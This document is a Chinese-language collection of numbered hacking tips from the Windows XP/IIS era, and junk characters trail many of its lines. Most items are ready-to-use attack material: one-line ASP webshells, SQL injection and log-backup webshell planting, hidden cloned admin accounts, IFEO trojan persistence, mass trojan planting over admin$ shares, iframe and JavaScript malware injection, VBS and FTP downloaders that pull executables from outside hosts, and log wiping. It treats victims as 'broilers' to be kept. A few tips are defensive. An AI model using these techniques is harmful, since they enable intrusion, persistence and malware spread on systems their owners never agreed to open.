1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,( N% v% u* t( P4 ^
cacls C:\windows\system32 /G hqw20:R6 E" d! X* ~ ` P8 M2 W
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入, Y0 \2 L4 p1 R, D: i
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F% D& a! _$ Z6 P# i
/ u6 Q( I# N, {$ v6 q2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
0 v& ` g) h4 O2 z# F+ s8 E& H$ C4 W* p
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。+ ^ t$ b9 S, `" B0 \
' H, q) J+ r2 p D1 e) {) n% ^
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号) D; j3 |3 q6 _* q7 S9 v5 U# L
+ C8 V# p! T3 @, g8 L3 H2 l! R5、利用INF文件来修改注册表
" M2 H/ K! R& N6 k5 N1 L[Version]2 T6 Z N3 V. J k: e+ Y m
Signature="$CHICAGO$"
3 Q$ d, _% t G* x. C% d[Defaultinstall]
7 \* T& Q) a) D7 Z: waddREG=Ating' s! V- N% I# [9 u% c) N: [* k
[Ating]
9 ~, z+ E; |) x4 L; nHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
& k$ T. Z" r! c" N) a以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
* K( w( C; [/ ~$ a" r! Yrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径- R, h [& N' N1 ~
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
) h& h5 A3 S! e6 cHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
: V6 R; V% H6 Z2 |3 g: D8 B0 IHKEY_CURRENT_CONFIG 简写为 HKCC
) ^3 l- m* A9 E! i6 T Z0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
. A; l( h4 w5 U" m7 W) e5 ?"1"这里代表是写入或删除注册表键值中的具体数据( r0 y# a5 e' P. g m( n% Z
; L- A: k2 M6 p4 D( ?0 y6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
5 ]* p; |. J, v$ I u多了一步就是在防火墙里添加个端口,然后导出其键值
4 H( p7 H4 W4 p( x K3 k1 e! o+ o[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
4 j9 P' a, j0 X8 t5 e. W( h: w' R& s. i9 g4 \) q
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽- ?% {, G0 z8 O4 o2 A2 J7 Y
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
9 v& O b- b( R& y2 U+ }
x9 P8 z @" J5 }+ ~8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。$ ]! o6 T' n% F7 C. a0 R
9 _; v: _! o* p+ \0 W+ o
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
; q# Z* ]8 T7 R2 e2 k可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
8 Z1 J3 W& ?1 [! ?% `% O+ y+ i2 X
: i' O1 l2 R( O: i10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
: L9 ?" D( j8 d8 P& D9 X
3 p- ]8 w% E$ F5 {/ q11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
" A* ^; `" }) \/ @! x用法:xsniff –pass –hide –log pass.txt
) l: h6 T5 L/ r% m* v0 N! J
2 y- }! ^5 X2 m12、google搜索的艺术& Q7 [# z; K; t1 F# w
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”# S; P% K$ X( W( O5 P2 s$ n4 z
或“字符串的语法错误”可以找到很多sql注入漏洞。
: s, @) u8 {/ F' D4 G: R6 N* d# Q6 w
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。& w8 c; p" W z2 a' b: f
8 \1 N( Z+ y, d4 s; s! L; r8 M# W14、cmd中输入 nc –vv –l –p 19875 I8 m7 s. ~- o% Q' @
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
6 a' x9 |. |8 m6 [
0 P% a2 R7 X: k: G; ~" g4 ~2 K15、制作T++木马,先写个ating.hta文件,内容为
0 Q8 Z2 j' e6 ~% b. w; G' ]<script language="VBScript">( ]6 v+ b. V4 f5 J K3 @$ t
set wshshell=createobject ("wscript.shell" )
5 {: z9 m# A: o( wa=wshshell.run("你马的名称",1)7 y/ J5 _5 R, M
window.close
/ [+ _9 T8 E3 x</script>
* A3 ]' S& A1 z8 R& l2 i再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。/ g ]& U0 x. e; F; O
- o Y' [% c+ d2 }. k; Z, o) s3 H# w
16、搜索栏里输入 i( r4 [& O' c$ d
关键字%'and 1=1 and '%'='& j# O0 l0 X2 L3 }3 g, l& c" H" O
关键字%'and 1=2 and '%'='- u4 C/ u5 q' s; V8 R4 m. E
比较不同处 可以作为注入的特征字符; r& A* D2 C/ \8 S7 W
. A: p* @ p9 d# ]: I1 ~0 }) B/ S! W17、挂马代码<html>
2 \& A5 i" M' w& @1 V<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
6 |9 @7 k* c! s" C6 t</html>5 |- f- N4 w5 B/ |- ~' w! V7 K: [& {
5 {4 t- j* {' Q$ X5 t
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
. |# Z0 H" N) K0 A- bnet localgroup administrators还是可以看出Guest是管理员来。
" J f0 |$ {) T% _% o
. E4 E" o4 L0 I; B1 `19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
7 q$ A& K; ?; v3 O用法: 安装: instsrv.exe 服务名称 路径
5 t4 b0 d" E. H7 `. c5 b+ b7 x卸载: instsrv.exe 服务名称 REMOVE& y c- o+ g+ @, T1 v! V$ M- X# Z- m
. _. M1 V3 Q) c4 Y |
/ C% T, {& p! ^) Z7 _* `, X6 L3 c21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
8 I4 r( z9 S0 ]9 S不能注入时要第一时间想到%5c暴库。* Y3 G. `+ i( A' I
2 \+ o( e0 p0 A( [ W
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
5 V+ z% j1 G, \! }1 t+ F, ?/ k! k% I4 T2 H$ G. P9 M8 G
23、缺少xp_cmdshell时
/ v0 O8 O! v' I9 ^2 Y/ y尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'8 B/ L/ `2 H/ e
假如恢复不成功,可以尝试直接加用户(针对开3389的)
% K# u9 |$ _8 N( Rdeclare @o int
" A2 [" D* R1 ?. E) ]exec sp_oacreate 'wscript.shell',@o out
' q$ D0 z: I$ d& v4 n6 Fexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员/ e( J1 ^) S+ { D( e' P* l# n
. s$ V' P9 U* i/ ]$ R& o24.批量种植木马.bat; D& c% w) q2 o9 t; l
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
: f; u; n+ V c* kfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间$ W6 ]. s$ A' p* m! X! ~
扫描地址.txt里每个主机名一行 用\\开头- f' F$ Q! ?; m
. w& S) v& ^3 R' J& H( J# i/ F
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
( a5 [" e6 u+ O$ ]7 L- }4 c
# R) @# v* ]8 p7 N, H* V7 x9 Y. T26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.& s+ A+ \; _9 P
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.3 V0 Y, G( C4 ]: e' z% Z/ d( n
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马4 h9 s5 Q! l6 a% f, L `* G; I
9 E8 c: F7 [6 K p P7 Q27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP/ A: B# Z* D7 G+ i+ A* w# `( Q
然后用#clear logg和#clear line vty *删除日志
7 p6 I1 z/ r0 @ _1 u8 E3 F4 S) G* Z7 b9 v
28、电脑坏了省去重新安装系统的方法
/ T; r! [' u \6 O' v0 T纯dos下执行,
# j: h" D( L P' K+ U/ u- J) Kxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config5 i$ m8 }1 C2 G0 U( m D$ l+ D
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
. }* f- s6 u2 I. D& [' l4 G% W/ O5 J% y2 K. n
29、解决TCP/IP筛选 在注册表里有三处,分别是:3 E2 R) I" X% ~" E; I! K; e
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
& H: B+ I9 |, i/ @* PHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip5 z+ @; s8 N+ o. z( w R& E
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& A1 A9 A, K4 L# `/ e分别用
- n# k) H; d. U" B: G: J9 }. }+ w& yregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
. V3 [7 `$ F8 [regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip! S1 k8 u9 V2 `9 z0 j4 k
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
% j, Y! t1 I7 w5 }% A+ n命令来导出注册表项
8 a; Z, w3 t2 {: I然后把三个文件里的EnableSecurityFilters"=dword:00000001,
) o* [* A3 v9 W改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用1 Q$ v, d& U$ |1 N! j1 ]6 j
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。, L9 |2 W* Y. a* q- k
; L/ W, U9 f; ]7 h
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
8 O% Y' Y4 T, }0 P9 RSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3 M, I4 Z) R" B+ e+ M$ y5 M; o8 J
7 Z/ O' Q" A& w* L# T5 u31、全手工打造开3389工具
2 z1 a q& Y0 g打开记事本,编辑内容如下:
0 ]# s) H) E. l: wecho [Components] > c:\sql
" j( I6 t7 x2 x! v& B1 Hecho TSEnable = on >> c:\sql: Y3 b5 V* K; [( ~2 ?6 B# `* w# ?$ s
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q3 t. R3 E3 I# |# S3 @
编辑好后存为BAT文件,上传至肉鸡,执行3 |( P' W. v% t# x
9 E% `0 f5 }# C( F" _( V
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马! H, {% @9 m0 E" U9 e
/ b M# ? X+ F5 Y3 _: T' h" x
33、让服务器重启
1 g2 i; X6 p P- q; J8 ^; Q写个bat死循环:3 g' C- k( ?5 {2 @: Y3 S+ [' c
@echo off- R- S$ g' {, y0 C1 @
:loop1/ n7 r6 l1 E/ ^( q ]9 e
cls
* [3 Q E, H y, Bstart cmd.exe
, N" S% Q& I4 \ s% E. i, k6 a6 \# igoto loop1
; ~" Q. J! a# \6 h$ E保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
* W! G4 R4 X4 k- A3 K% M' r
; i* G3 b# ~# U) O# G1 s' B: L34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
+ \; B2 F2 ^5 T U7 Q@echo off
' {1 b* z% m' L4 z* U, ~date /t >c:/3389.txt1 g9 ~. l/ e" u; S& ?5 q
time /t >>c:/3389.txt0 r: D4 s" X5 \1 ~3 y& L
attrib +s +h c:/3389.bat
$ C2 G0 ^$ X) \, D8 ]1 N1 a' {attrib +s +h c:/3389.txt
. d, P7 q* h! J" gnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
0 m8 o: ]: | }! Z并保存为3389.bat9 U& Z7 o- V4 L( ~. G
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号8 c$ ^" v6 w9 Y/ `
) z' ]8 K5 P0 b0 O35、有时候提不了权限的话,试试这个命令,在命令行里输入:
; G( }* n- R2 v( Q: P8 ?start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页), h' G5 T9 _9 Q4 W3 h [9 x4 C! S8 @
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
" |8 B9 o, @$ C% ^1 G4 V0 C4 |- D6 a% Y- [
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
, O; g, q: }2 i6 h. Secho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址3 p4 Z: g% e5 O0 a) V; e% X( }
echo 你的FTP账号 >>c:\1.bat //输入账号+ i p. [. b( m. [# F: L
echo 你的FTP密码 >>c:\1.bat //输入密码
: J- `# [6 O/ H7 B1 a* X% ]echo bin >>c:\1.bat //登入' o. ?; r2 G2 ?' t* M
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
" l; t2 _) i; Q# b! yecho bye >>c:\1.bat //退出- t0 h* X4 K) y$ c
然后执行ftp -s:c:\1.bat即可2 J. `) H0 I5 }9 W7 y0 j6 S
7 a7 J; f# m& E- B8 }4 e% f
37、修改注册表开3389两法# B% m& a9 d o0 Y* u
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表2 P9 H+ x& V' `2 A4 A
echo Windows Registry Editor Version 5.00 >>3389.reg
* e3 K+ ^ D: {# Gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
: z! }9 f0 l; Vecho "Enabled"="0" >>3389.reg/ |* l" x3 f! F6 R6 c8 e* U
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
/ W, x$ m6 j# Q- a- q. c$ q4 V9 ONT\CurrentVersion\Winlogon] >>3389.reg
2 r" r) D# ~0 ?& l: cecho "ShutdownWithoutLogon"="0" >>3389.reg- o; F0 v) C) D& V+ J, y" K3 \7 P
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]6 Q; l; r' ?' l2 n3 s' C9 r9 l
>>3389.reg! \) s: V h" [: ~4 S
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
% i! o1 O+ q" W" \$ [2 ~% }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]) K" g: W/ X" j+ q( f7 A
>>3389.reg
2 B, v" J8 p3 vecho "TSEnabled"=dword:00000001 >>3389.reg
0 A% u9 {7 N% F3 `# N& s+ {; ~! Oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
( H7 ?9 ~ [ m4 ~! F7 E t0 E0 |& I2 techo "Start"=dword:00000002 >>3389.reg1 z, R& L7 u1 l& W! L& }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
J/ R5 z6 T: N* @# }% c* n>>3389.reg/ ]" F- E6 u' Q, f F. }
echo "Start"=dword:00000002 >>3389.reg
* {3 X2 |; O+ }0 Lecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
* m$ {, x8 x9 Hecho "Hotkey"="1" >>3389.reg
$ m+ r- y' I) T1 `3 \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" J# c3 s) o, r1 H
Server\Wds\rdpwd\Tds\tcp] >>3389.reg) u' M/ f+ s& C6 |$ R) _
echo "PortNumber"=dword:00000D3D >>3389.reg9 s6 A5 U' P, H0 x' ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* ^% n7 p! f) }/ h* e
Server\WinStations\RDP-Tcp] >>3389.reg
4 R! S( Q5 b1 n2 \. ?echo "PortNumber"=dword:00000D3D >>3389.reg
z7 ~; w4 Q4 u- m7 y把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
) a4 v; g1 U& A(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)( i7 c& a9 Z$ ~+ F
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效0 T$ b8 h/ y2 f7 c
(2)winxp和win2003终端开启
+ E8 Y G' D( c [- }用以下ECHO代码写一个REG文件:; I1 b/ Y( w% E6 c/ K
echo Windows Registry Editor Version 5.00>>3389.reg
7 `. |* L1 e" G' h+ ]- _8 ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 E* S" {0 m' l( ] EServer]>>3389.reg8 ^- E. Y; m6 k$ ^; b7 M
echo "fDenyTSConnections"=dword:00000000>>3389.reg
! T0 @7 ]8 \% h; W. E k* F, N/ Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ Z6 @# p6 L$ [. U1 l }$ P; H1 {7 yServer\Wds\rdpwd\Tds\tcp]>>3389.reg6 {6 A4 N" B6 x7 Z- m: x$ I
echo "PortNumber"=dword:00000d3d>>3389.reg
+ w7 a, q3 u* |echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; i9 q4 E9 ]7 O0 \1 c" ^& zServer\WinStations\RDP-Tcp]>>3389.reg X9 t$ n7 T4 Q2 T' F: C
echo "PortNumber"=dword:00000d3d>>3389.reg( g' N4 ~- e% D) ~
然后regedit /s 3389.reg del 3389.reg) h1 X, B4 ?7 s( H9 K
XP下不论开终端还是改终端端口都不需重启
0 n1 ^! d0 s! e; I* I/ _5 R" X5 p" L& |3 c3 t
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃; j& z/ o1 G3 T S s# S% h H3 ~
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
$ `; Y( g |7 k1 M7 G7 E2 G/ V% \! M' y3 m
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!9 \8 P, M% p; \0 z
(1)数据库文件名应复杂并要有特殊字符- a" L1 F$ X0 _7 ~2 u; D+ s
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源' W* ^1 n7 s( u: M
将conn.asp文档中的+ I' G9 E+ K1 h9 r7 R6 g' {6 C9 l
DBPath = Server.MapPath("数据库.mdb")
+ {% T& m. M) H: f. b% Aconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
) Y) ^- t9 q8 J2 f& K2 P" J- V& j: l
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
7 H }: o- _* ]! Z8 W! F1 _(3)不放在WEB目录里- H2 p. R9 F9 X: s
5 m$ c/ F1 q# k
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉4 t7 E) v/ |8 o" L/ T( I
可以写两个bat文件. k6 o3 p! K+ [. _% Z4 ~
@echo off
6 ?8 M! U2 i& O3 h2 C@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
% s) |) j& J3 T5 s7 p" q@del c:\winnt\system32\query.exe6 S& K7 |/ z, A- t# q
@del %SYSTEMROOT%\system32\dllcache\query.exe
, V! E* S# L% k( c. g@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的. M5 u* a! a( F- v2 F; e! X
: ?# d) X6 M2 E( M@echo off8 l: N h4 `. f' x4 P! e: O8 i
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe. }9 M& T) q h
@del c:\winnt\system32\tsadmin.exe5 N1 x' |" Y: V. C! U5 o
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
; T# D" [5 v# \1 P' D
( O( z* U, t7 n2 L Z2 z% w41、映射对方盘符
/ ^2 O% ?# @8 d6 V0 Ptelnet到他的机器上,
- x# h$ i% G6 v6 g, S4 gnet share 查看有没有默认共享 如果没有,那么就接着运行& q1 P Z5 b; h; N8 R+ d4 u, H, K/ n
net share c$=c:( \8 O; X3 E1 ^$ z$ m
net share现在有c$
* L0 z; |& F+ W7 `% c/ T' E" s在自己的机器上运行( }3 |4 L/ }7 e; |( H& B% y
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
; u; T" c( H, C, u9 I% ^4 R2 g1 E! k1 y' _( Q& m' x1 F
42、一些很有用的老知识0 R' K! Z4 x1 P' _- d
type c:\boot.ini ( 查看系统版本 )
1 M9 @. q2 A) L+ K, \8 _net start (查看已经启动的服务) K+ ~& t' N0 E3 K. m7 d- N
query user ( 查看当前终端连接 ) Z0 W" ~$ }( l9 X
net user ( 查看当前用户 )1 e! X5 s# D$ V. L) C
net user 用户 密码/add ( 建立账号 )/ d! I& ?- o" o7 v2 O9 b0 @* Y
net localgroup administrators 用户 /add (提升某用户为管理员)
# F' O: @! q' j. }$ Wipconfig -all ( 查看IP什么的 )* F8 V8 c% R7 o& r0 y
netstat -an ( 查看当前网络状态 ) }4 l/ m5 r7 _& |0 F
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)9 [; U- y' j5 j9 N, v) Q
克隆时Administrator对应1F46 O' ?" U: h/ v# E5 I5 Y4 e
guest对应1F5: J# B8 F; Z, g7 v1 B( o: O' N$ @
tsinternetuser对应3E8; S" @- F( ? b' x! n" {
{& c% \- W& S3 ^! O43、如果对方没开3389,但是装了Remote Administrator Service
9 |6 Y7 S4 d' ^用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接# G8 z& z3 H3 F0 w0 f' k1 ^( s
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息' q1 r& r0 q$ i* P/ J/ l+ H7 ~
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
, u7 h1 v* G1 O# U1 w8 R& O: b0 S) G
/ p4 V% j$ ~5 |+ Q! a8 \8 T44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)1 f8 T9 j4 G X" ^- O
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)9 O! u4 y- X1 H& |; c& o
Q, h7 A& {$ k0 C
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)$ t+ @6 M: n' c$ L; x6 e3 T
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
8 H7 H8 }* ?7 w9 v2 H {^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =7 [; F5 D' W0 N/ w" J. n/ l
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =/ k! ^) ?1 c! s& s
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs' I: }# b" I$ l" c
(这是完整的一句话,其中没有换行符)$ \+ g/ [$ G% t$ U
然后下载:& v; x' H! j; R* U# D! w
cscript down.vbs http://www.hack520.org/hack.exe hack.exe* E! s! z$ k/ `8 ~( y
, H3 X+ ?5 B% X: @2 @* V4 R
46、一句话木马成功依赖于两个条件:9 D# o: n# U6 ^8 _+ L* J0 p8 J/ s7 ^
1、服务端没有禁止adodb.Stream或FSO组件
1 }9 a6 g" Q8 g2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。2 \5 F) G9 A w1 t; Q! ]8 ? A+ k
& p p' q1 M& Z. U% l9 w2 r
47、利用DB_OWNER权限进行手工备份一句话木马的代码:* v4 G: \6 c- _8 B( K: b6 ^7 E
;alter database utsz set RECOVERY FULL--/ F! u) }: Z& k$ F
;create table cmd (a image)--8 G3 o7 q& N* ^; h" J2 ]
;backup log utsz to disk = 'D:\cmd' with init--
' |& ]) W, H8 q; ~3 ~! h6 O f$ T;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
- k; q5 M6 Q( x* z' L;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--% g" U* M& m1 M
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。1 {3 W, O' X U5 u! Z; J
" ?- F4 b: Q# e& n* \% E
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:1 ]; x% _" Q d+ K+ N: G, a: A
7 r5 i# U7 p6 j, F% T& `8 a- Y用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
& R4 X! `6 U7 h+ b7 C D$ L% t所有会话用 'all'。
# n% u+ B$ O0 r, E7 F2 M; W-s sessionid 列出会话的信息。
/ p$ v# Z u( K2 e5 Z: g! y: f3 J% G-k sessionid 终止会话。
: Q+ A( X5 e& z( |% f' x-m sessionid 发送消息到会话。: o! ]9 y# R- b' b: g% k
9 m* K& t. }* v1 w2 i5 ^" Y3 Cconfig 配置 telnet 服务器参数。
, o# Y& i5 s9 f/ r$ U: y) i9 @9 a
common_options 为:
- @" M1 J8 B/ b; V-u user 指定要使用其凭据的用户4 |4 e1 P/ Q+ I) d: {
-p password 用户密码# j' a5 K# B/ }9 O/ w6 P. Y, p0 d
8 a. S: x1 q; z$ x6 Aconfig_options 为:
; t% o2 d9 W4 i+ V& B6 F, j* h. q8 M0 cdom = domain 设定用户的默认域8 o$ V. u! Z0 x% \
ctrlakeymap = yes|no 设定 ALT 键的映射7 |5 B, D- D! K1 E& o* g8 G
timeout = hh:mm:ss 设定空闲会话超时值
8 U$ r' O: X2 ~* f. ]( m/ Ltimeoutactive = yes|no 启用空闲会话。
/ L" {5 V; s4 f$ fmaxfail = attempts 设定断开前失败的登录企图数。* ` @+ C \# k2 n/ j
maxconn = connections 设定最大连接数。0 { l, [6 P# `* @8 f# t
port = number 设定 telnet 端口。
9 g0 L3 G: N! s. O1 Ssec = [+/-]NTLM [+/-]passwd0 l* v8 H* H4 b- i. p
设定身份验证机构3 c2 D/ A* u0 u4 \
fname = file 指定审计文件名。* ]! N; u! i8 I4 L% x
fsize = size 指定审计文件的最大尺寸(MB)。
9 x4 f3 t( H) L/ b2 v( _mode = console|stream 指定操作模式。
% ~% G% C, e" \3 kauditlocation = eventlog|file|both0 r( m3 L s! ^% n
指定记录地点
7 P8 _7 a* y$ Aaudit = [+/-]user [+/-]fail [+/-]admin$ z+ K1 j9 X8 s
0 s/ u5 d6 p. D4 J2 U5 |! |
49、例如:在IE上访问:+ ~$ o% V) j$ F4 i' {1 U0 w5 a' N
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
1 K! k$ g! b, [! o7 qhack.txt里面的代码是:
- ?$ H- ^. ]9 Y<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">) y z/ b& P6 R: _" M- U
把这个hack.txt发到你空间就可以了!2 d% m2 G9 G4 p: e
这个可以利用来做网马哦!
0 M& n6 l. M0 y) x2 h/ b. x
" k; [% I, P( r" W50、autorun的病毒可以通过手动限制!
M) u6 ] `5 [& u0 C& Z1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!5 x1 ]' J6 q; \2 f- k3 ~1 x
2,打开盘符用右键打开!切忌双击盘符~1 h) K+ z- [8 b& N, t- C$ s9 O( |
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!9 ?% Y% V. ~# b
8 z& g4 e* r% H. T
51、log备份时的一句话木马:
; S' S- N3 S' t0 `1 ^) ea).<%%25Execute(request("go"))%%25>
. A' t& O5 ~0 ^/ yb).<%Execute(request("go"))%>
& X! ~5 P. Y1 o8 Fc).%><%execute request("go")%><%
% a4 p. Y! f3 d# \4 K' Od).<script language=VBScript runat=server>execute request("sb")</Script>( c3 t8 N/ G6 u0 s% f: T
e).<%25Execute(request("l"))%25>/ E; ?2 m4 y: j5 S& L* K
f).<%if request("cmd")<>"" then execute request("pass")%>% N" x* J$ d$ w0 W, M3 h1 D% T
, F/ d" ^* L1 V j }
52、at "12:17" /interactive cmd
9 u7 L4 Q' A! W执行后可以用AT命令查看新加的任务
